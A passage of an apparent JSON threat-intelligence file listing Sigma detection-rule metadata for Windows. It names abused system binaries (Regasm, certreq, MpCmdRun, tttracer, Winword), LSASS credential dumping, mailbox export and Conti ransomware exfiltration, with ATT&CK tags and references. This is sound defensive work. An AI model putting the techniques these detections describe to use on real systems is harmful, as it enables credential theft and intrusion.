Regasm/Regsvcs utilities", - "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", - "value": "Regasm/Regsvcs Suspicious Execution", - "meta": { - "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", - "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.009" - ], - "creation_date": "2022/08/25", - "filename": "proc_creation_win_lolbin_regasm.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "value": "REGISTER_APP.VBS Proxy Execution", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_register_app.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", - "value": "Use of Remote.exe", - "meta": { - "refs": [ - "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_lolbin_remote.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", - "value": "Replace.exe Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/03/06", - "filename": "proc_creation_win_lolbin_replace.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "value": "Rundll32 InstallScreenSaver Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", - "level": "medium", - "falsepositive": [ - "Legitimate installation of a new screensaver" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", - "value": "Use of Scriptrunner.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/01", - "filename": "proc_creation_win_lolbin_scriptrunner.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use when App-v is deployed" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", - "value": "Using SettingSyncHost.exe as LOLBin", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" - ], - "creation_date": "2020/02/05", - "filename": "proc_creation_win_lolbin_settingsynchost.yml", - "author": "Anton Kutepov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "value": "Use Of The SFTP.EXE Binary As A LOLBIN", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/11/10", - "filename": "proc_creation_win_lolbin_sftp.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", - "value": "Sideloading Link.EXE", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1560732860935729152", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", - "value": "Suspicious Sigverif Execution", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", - "https://twitter.com/0gtweet/status/1457676633809330184", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_sigverif.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", - "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", - "value": "Use of Squirrel.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_squirrel.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", - "value": "Suspicious LOLBIN AccCheckConsole", - "meta": { - "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/01/06", - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the UI Accessibility Checker" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "value": "Suspicious Atbroker Execution", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_lolbin_susp_atbroker.yml", - "author": "Mateusz Wydra, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate, non-default assistive technology applications execution" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "value": "Suspicious Certreq Command to Download", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "value": "Suspicious Driver Install by pnputil.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of of Dxcap.exe", - "uuid": "60f16a96-db70-42eb-8f76-16763e333590", - "value": "Application Whitelisting Bypass via Dxcap.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", - "https://twitter.com/harr0ey/status/992008180904419328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_lolbin_susp_dxcap.yml", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Legitimate execution of dxcap.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "value": "Suspicious GrpConv Execution", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1526833181831200770", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2022/05/19", - "filename": "proc_creation_win_lolbin_susp_grpconv.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect the use of Windows Defender to download payloads", - "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", - "value": "Windows Defender Download Activity", - "meta": { - "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/09/04", - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", - "author": "Matthew Matchen", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process dump via legitimate sqldumper.exe binary", - "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "value": "Dumping Process via Sqldumper.exe", - "meta": { - "refs": [ - "https://twitter.com/countuponsec/status/910977826853068800", - "https://twitter.com/countuponsec/status/910969424215232518", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", - "author": "Kirill Kiryanov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate MSSQL Server actions" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", - "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", - "value": "WSL Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", - "https://twitter.com/nas_bench/status/1535431474429808642", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_lolbin_susp_wsl.yml", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Automation and orchestration scripts may use this method execute scripts etc", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", - "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/12", - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", - "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" - ], - "creation_date": "2021/07/16", - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "value": "Use of TTDInject.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_ttdinject.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "value": "Time Travel Debugging Utility Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", - "value": "UtilityFunctions.ps1 Proxy Dll", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/28", - "filename": "proc_creation_win_lolbin_utilityfunctions.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "value": "Use of VisualUiaVerifyNative.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate testing of Microsoft UI parts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "value": "Visual Basic Command Line Compiler Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Utilization of this tool should not be seen in enterprise environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", - "value": "Use of VSIISExeLauncher.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", - "value": "Use of Wfc.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_lolbin_wfc.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate use by a software developer" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "value": "Winword LOLBIN Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", - "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/05/17", - "filename": "proc_creation_win_lolbin_winword.yml", - "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "value": "Wlrmdr Lolbin Use as Launcher", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/02/16", - "filename": "proc_creation_win_lolbin_wlrmdr.yml", - "author": "frack113, manasmbellani", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Too long PowerShell command lines", - "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "value": "Too Long PowerShell Commandlines", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_long_powershell_commandline.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_lsass_dump.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "value": "Suspicious PowerShell Mailbox Export to Share", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2021/08/07", - "filename": "proc_creation_win_mailboxexport_share.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to find volume shadow backups", - "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "value": "Conti Volume Shadow Listing", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to exfiltrate NTDS", - "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", - "value": "Conti NTDS Exfiltration Command", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560" - ], - 